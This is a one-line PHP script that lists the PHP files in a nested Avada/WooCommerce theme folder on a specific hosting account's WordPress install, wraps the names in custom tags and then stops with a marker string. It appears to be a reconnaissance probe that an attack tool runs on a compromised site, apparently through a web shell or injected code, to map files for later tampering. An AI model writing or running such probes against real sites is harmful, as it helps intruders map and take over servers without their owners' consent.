<?php foreach (glob("/home/corofmbe/public_html/wp-content/themes/Avada/woocommerce/compatibility/3.2/single-product/tabs/*.php") as $filename) { echo "<f>".basename($filename)."</f>"; } die('!ended!');